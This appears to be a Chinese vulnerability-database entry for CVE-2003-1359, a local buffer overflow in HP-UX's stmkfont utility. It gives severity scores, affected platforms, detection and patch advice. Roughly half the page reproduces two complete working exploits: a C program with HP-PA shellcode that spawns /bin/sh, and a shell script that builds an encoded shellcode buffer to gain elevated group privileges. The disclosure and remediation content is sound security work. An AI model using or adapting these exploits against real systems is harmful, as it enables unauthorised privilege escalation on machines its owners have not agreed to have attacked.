CVE-2003-1359
CVSS7.2
发布时间 :2003-12-31 00:00:00
修订时间 :2009-03-04 00:20:37
NMCOE    

[原文]Buffer overflow in stmkfont utility of HP-UX 10.0 through 11.22 allows local users to gain privileges via a long command line argument.


[CNNVD]HP-UX stmkfont未明本地缓冲区溢出漏洞(CNNVD-200312-228)

        
        HP-UX是惠普公司开发和维护的商业性质UNIX操作系统。
        HP-UX系统包含stmkfont工具存在缓冲区溢出漏洞,本地攻击者可以利用这个漏洞进行权限提升攻击。
        目前没有提供详细漏洞细节。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:avaya:predictive_dialer_system:9.0Avaya Predictive Dialer System 9.0
cpe:/o:hp:hp-ux:10.09HP HP-UX 10.9
cpe:/o:hp:hp-ux:10.24HP HP-UX 10.24
cpe:/o:hp:hp-ux:11.04HP HP-UX 11.04
cpe:/o:hp:hp-ux:11.0.4HP HP-UX 11.0.4
cpe:/o:hp:hp-ux:11.20HP-UX 11i v1.5
cpe:/o:hp:hp-ux:10.26HP HP-UX 10.26
cpe:/a:avaya:predictive_dialer_system:11Avaya Predictive Dialer System 11
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:10.16HP HP-UX 10.16
cpe:/o:hp:hp-ux:10.10HP HP-UX 10.10
cpe:/o:hp:hp-ux:11.11HP-UX 11.11
cpe:/o:hp:hp-ux:10.34HP HP-UX 10.34
cpe:/o:hp:hp-ux:10.30HP HP-UX 10.30
cpe:/o:hp:hp-ux:11.22HP-UX 11i v1.6
cpe:/o:hp:hp-ux:10.08HP HP-UX 10.8
cpe:/a:avaya:predictive_dialer_system:12Avaya Predictive Dialer System 12
cpe:/o:hp:hp-ux:10.00HP HP-UX 10.00
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:10.01HP HP-UX 10.01

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5587There is a potential buffer overflow in /usr/bin/stmkfont.
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1359
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1359
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-228
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/11313
(PATCH)  XF  hp-stmkfont-bo(11313)
http://www.securityfocus.com/bid/6836
(PATCH)  BID  6836
http://www.securityfocus.com/archive/1/324381
(UNKNOWN)  BUGTRAQ  20030610 [LSD] HP-UX security vulnerabilities
http://www.securityfocus.com/advisories/4959
(UNKNOWN)  HP  HPSBUX0302-241
http://securityreason.com/securityalert/3236
(UNKNOWN)  SREASON  3236

- 漏洞信息

HP-UX stmkfont未明本地缓冲区溢出漏洞
高危 缓冲区溢出
2003-12-31 00:00:00 2009-03-04 00:00:00
本地  
        
        HP-UX是惠普公司开发和维护的商业性质UNIX操作系统。
        HP-UX系统包含stmkfont工具存在缓冲区溢出漏洞,本地攻击者可以利用这个漏洞进行权限提升攻击。
        目前没有提供详细漏洞细节。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在漏洞修补之前暂时去掉程序的setuid位:
        # chmod 555 /usr/bin/stmkfont
        厂商补丁:
        HP
        --
        HP已经为此发布了一个安全公告(HPSBUX0302-241)以及相应补丁:
        HPSBUX0302-241:SSRT3472 Potential Security Vulnerability in stmkfont
        链接:
        http://archives.neohapsis.com/archives/hp/2003-q1/0028.html

        补丁下载:
        HP Patch PHSS_15423
        
        http://itrc.hp.com/

- 漏洞信息 (22246)

HP-UX 10.x stmkfont Alternate Typeface Library Buffer Overflow Vulnerability (1) (EDBID:22246)
hp-ux local
2003-02-12 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/6836/info

A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option.

A local attacker may be able to exploit this issue to execute arbitrary code with elevated privileges.

All Avaya PDS 9 and 11 platforms are vulnerable to this issue. Avaya PDS 12 platforms running on HP-UX 11.00 are vulnerable as well. PDS 12 versions running on HP-UX 11.11 are not vulnerable. 

/*## copyright LAST STAGE OF DELIRIUM jun 2002 poland        *://lsd-pl.net/ #*/
/*## /usr/bin/stmkfont                                                       #*/

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

#define ADRNUM 1200
#define NOPNUM 12000 
#define PADNUM 3

char shellcode[]=
    "\xeb\x5f\x1f\xfd"    /* bl     .+8,%r26               */
    "\x0b\x39\x02\x99"    /* xor    %r25,%r25,%r25         */
    "\xb7\x5a\x40\x22"    /* addi,< 0x11,%r26,%r26         */
    "\x0f\x40\x12\x0e"    /* stbs   %r0,7(%r26)            */
    "\x20\x20\x08\x01"    /* ldil   L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"    /* ble    R%0xc0000004(%sr7,%r1) */
    "\xb4\x16\x70\x16"    /* addi,> 0xb,%r0,%r22           */
    "/bin/sh"
;

char jump[]=
    "\xe0\x40\x00\x00"    /* be     0x0(%sr0,%rp)          */
    "\x37\xdc\x00\x00"    /* copy   %sp,%ret0              */
;

char nop[]="\x0a\xb5\x02\x95";

int main(int argc,char **argv){
    char buffer[20000],adr[4],*b,*envp[2];  
    int i; 

    printf("copyright LAST STAGE OF DELIRIUM jun 2002 poland  //lsd-pl.net/\n");
    printf("/usr/bin/stmkfont for HP-UX 10.20 700/800\n");    

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-16732;
    printf("0x%x\n",*((unsigned long*)adr));

    envp[0]=&buffer[2000];
    envp[1]=0;

    b=buffer;
    for(i=0;i<PADNUM;i++) *b++=0x61;
    for(i=0;i<ADRNUM;i++)  *b++=adr[i%4];
    *b=0;

    b=&buffer[2000];
    strcpy(b,"lsd=");b+=4;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/bin/stmkfont","lsd",buffer,0,envp);
}
		

- 漏洞信息 (22247)

HP-UX 10.x stmkfont Alternate Typeface Library Buffer Overflow Vulnerability (2) (EDBID:22247)
hp-ux local
2003-02-20 Verified
0 watercloud
N/A [点击下载]
source: http://www.securityfocus.com/bid/6836/info
 
A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option.
 
A local attacker may be able to exploit this issue to execute arbitrary code with elevated privileges.
 
All Avaya PDS 9 and 11 platforms are vulnerable to this issue. Avaya PDS 12 platforms running on HP-UX 11.00 are vulnerable as well. PDS 12 versions running on HP-UX 11.11 are not vulnerable.

#!/bin/sh
#   File : ex_stmkfont.sh
#   Exploit for command stmkfont of HPUX to get bin gid BUFF.
# * Usage: chmod +x ex_stmkfont.sh ; ./ex_stmkfont.sh
#   Write by watercloud@xfocus.org       2003-2-20
#   Site : www.xfocus.org   www.xfocus.net
NOP_LEN=65
ADDR_LEN=5000
BUFF="";i=0
while [ $i -ne $NOP_LEN ] ; do
  BUFF=$BUFF'\0013\0071\0002\0231'  ; i=$(($i+1))
done
BUFF=$BUFF'\0013\0071\0002\0127\0052\0344\0227\0020\0050\0073\0160\0357\0010\0067\0002\0103'
BUFF=$BUFF'\0266\0372\0100\0004\0266\0371\0100\0004\0266\0370\0100\0004\0344\0140\0340\0010'
BUFF=$BUFF'\0266\0366\0100\0376\0013\0071\0002\0231\0053\0044\0227\0020\0050\0073\0160\0357'
BUFF=$BUFF'\0353\0137\0037\0375\0013\0071\0002\0231\0267\0132\0100\0042\0017\0100\0022\0016'
BUFF=$BUFF'\0010\0071\0002\0103\0344\0140\0340\0010\0264\0026\0160\0026/bin/shX'
i=0;
while [ $i -ne $ADDR_LEN ] ; do
  BUFF=$BUFF'\0177\0177\0001\0020'; i=$(($i+1))
done
STR=`/bin/echo "${BUFF}"`

/usr/bin/stmkfont -d1 x -d2 $STR x
#EOF		

- 漏洞信息

13768
HP-UX stmkfont CLI Overflow
Input Manipulation
Loss of Integrity Patch / RCS

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-02-13 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站